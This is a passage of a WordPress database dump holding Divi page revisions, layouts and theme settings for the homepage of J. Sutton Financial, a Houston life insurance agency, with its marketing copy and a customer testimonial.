_module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" min_height=\"377.5px\" custom_padding=\"4px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" title_text=\"Young happy couple video call to family with laptop computer at\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" position_origin_r=\"top_right\" custom_margin=\"45px||45px||false|false\" global_colors_info=\"{}\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" align=\"right\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"54%\" max_width=\"83%\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"282px\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||-63px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"6px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 19:09:06','2023-03-26 19:09:06','',138,'http://cmdev-site1.com/?p=500',0,'revision','',0),(499,1,'2023-03-26 19:00:30','2023-03-26 19:00:30','[et_pb_section fb_built=\"1\" fullwidth=\"on\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"||364px|||\" global_colors_info=\"{}\"][et_pb_fullwidth_menu _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_fullwidth_menu][et_pb_fullwidth_code _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" width=\"75%\" max_width=\"75%\" module_alignment=\"center\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" admin_label=\"Fullwidth Code\"]<h1 style=\"color: #fff\"><!-- [et_pb_line_break_holder] -->J. Sutton Financial, an Independent Agency for American Income Life Insurance Company  <!-- [et_pb_line_break_holder] --></h1><!-- [et_pb_line_break_holder] --><p style=\"color: #fff\"><!-- [et_pb_line_break_holder] -->  J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.<!-- [et_pb_line_break_holder] --></p>[/et_pb_fullwidth_code][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_menu _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][/dsm_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_typing_effect _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" before_typing_effect=\"J. Sutton Financial\" after_typing_effect=\"an Independent Agency for American Income Life Insurance Company  \"][/dsm_typing_effect][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" admin_label=\"Text\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][dsm_button button_one_text=\"Work for Us\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"|auto|-52px|auto||\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_font_size=\"54px\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" min_height=\"377.5px\" custom_padding=\"4px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" title_text=\"Young happy couple video call to family with laptop computer at\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" position_origin_r=\"top_right\" custom_margin=\"45px||45px||false|false\" global_colors_info=\"{}\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" align=\"right\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"54%\" max_width=\"83%\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"282px\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||-63px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"6px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 19:00:30','2023-03-26 19:00:30','',138,'http://cmdev-site1.com/?p=499',0,'revision','',0),(506,1,'2023-03-26 19:36:49','2023-03-26 19:36:49','{\n    \"et_divi[footer_columns]\": {\n        \"value\": \"1\",\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2023-03-26 19:33:16\"\n    },\n    \"et_divi[widget_body_font_size]\": {\n        \"value\": \"17\",\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2023-03-26 19:33:16\"\n    },\n    \"et_divi[footer_widget_header_color]\": {\n        \"value\": \"#ffffff\",\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2023-03-26 19:33:16\"\n    },\n    \"et_divi[custom_footer_credits]\": {\n        \"value\": \"\\u00a92023 J. Sutton Financial | All Rights Reserved | Privacy Policy\",\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2023-03-26 19:36:42\"\n    },\n    \"et_divi[footer_bg]\": {\n        \"value\": \"#666666\",\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2023-03-26 19:36:42\"\n    },\n    \"et_divi[bottom_bar_background_color]\": {\n        \"value\": \"#666666\",\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2023-03-26 19:36:42\"\n    },\n    \"et_divi[disable_custom_footer_credits]\": {\n        \"value\": false,\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2023-03-26 19:36:42\"\n    }\n}','','','trash','closed','closed','','22056115-5c66-4eeb-bfa1-682ec8fe93b9','','','2023-03-26 19:36:49','2023-03-26 19:36:49','',0,'http://cmdev-site1.com/?p=506',0,'customize_changeset','',0),(507,1,'2023-03-26 19:37:24','2023-03-26 19:37:24','{\n    \"et_divi[show_footer_social_icons]\": {\n        \"value\": false,\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2023-03-26 19:37:24\"\n    }\n}','','','trash','closed','closed','','338fa238-b543-4cdb-bfb1-a6912e01d82d','','','2023-03-26 19:37:24','2023-03-26 19:37:24','',0,'http://cmdev-site1.com/2023/03/26/338fa238-b543-4cdb-bfb1-a6912e01d82d/',0,'customize_changeset','',0),(508,1,'2023-03-26 19:39:22','2023-03-26 19:39:22','{\n    \"site_icon\": {\n        \"value\": 483,\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2023-03-26 19:39:22\"\n    }\n}','','','trash','closed','closed','','e8d2396f-c3e3-4502-accf-12345a1f5518','','','2023-03-26 19:39:22','2023-03-26 19:39:22','',0,'http://cmdev-site1.com/2023/03/26/e8d2396f-c3e3-4502-accf-12345a1f5518/',0,'customize_changeset','',0),(509,1,'2023-03-26 19:39:55','2023-03-26 19:39:55','{\n    \"et_divi[accent_color]\": {\n        \"value\": \"#666666\",\n        \"type\": \"option\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2023-03-26 19:39:55\"\n    }\n}','','','trash','closed','closed','','38da3230-94e5-4e32-bd96-2186363cf831','','','2023-03-26 19:39:55','2023-03-26 19:39:55','',0,'http://cmdev-site1.com/2023/03/26/38da3230-94e5-4e32-bd96-2186363cf831/',0,'customize_changeset','',0),(510,1,'2023-03-26 19:49:37','2023-03-26 19:49:37','','Theme Builder Layout','','publish','open','closed','','theme-builder-layout-2','','','2023-03-26 19:49:37','2023-03-26 19:49:37','',0,'http://cmdev-site1.com/et_header_layout/theme-builder-layout-2/',0,'et_header_layout','',0),(512,1,'2023-03-26 19:51:28','2023-03-26 19:51:28','','Theme Builder','','trash','closed','closed','','__trashed-2','','','2023-03-26 19:51:28','2023-03-26 19:51:28','',0,'http://cmdev-site1.com/?post_type=et_theme_builder&#038;p=512',0,'et_theme_builder','',0),(513,1,'2023-03-26 19:50:31','2023-03-26 19:50:31','','Default Website Template','','publish','closed','closed','','default-website-template-3','','','2023-03-26 19:50:31','2023-03-26 19:50:31','',0,'http://cmdev-site1.com/et_template/default-website-template-3/',0,'et_template','',0),(514,1,'2023-03-26 19:50:50','2023-03-26 19:50:50','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','J. Sutton - Global Header','','publish','closed','closed','','j-sutton-global-header','','','2023-03-26 19:50:50','2023-03-26 19:50:50','',0,'http://cmdev-site1.com/et_pb_layout/j-sutton-global-header/',0,'et_pb_layout','',0),(516,1,'2023-03-26 19:52:18','2023-03-26 19:52:18','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','J. Sutton - Header','','trash','closed','closed','','j-sutton-header__trashed','','','2023-03-26 19:52:48','2023-03-26 19:52:48','',0,'http://cmdev-site1.com/et_pb_layout/j-sutton-header/',0,'et_pb_layout','',0),(518,1,'2023-03-26 19:52:48','2023-03-26 19:52:48','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\" 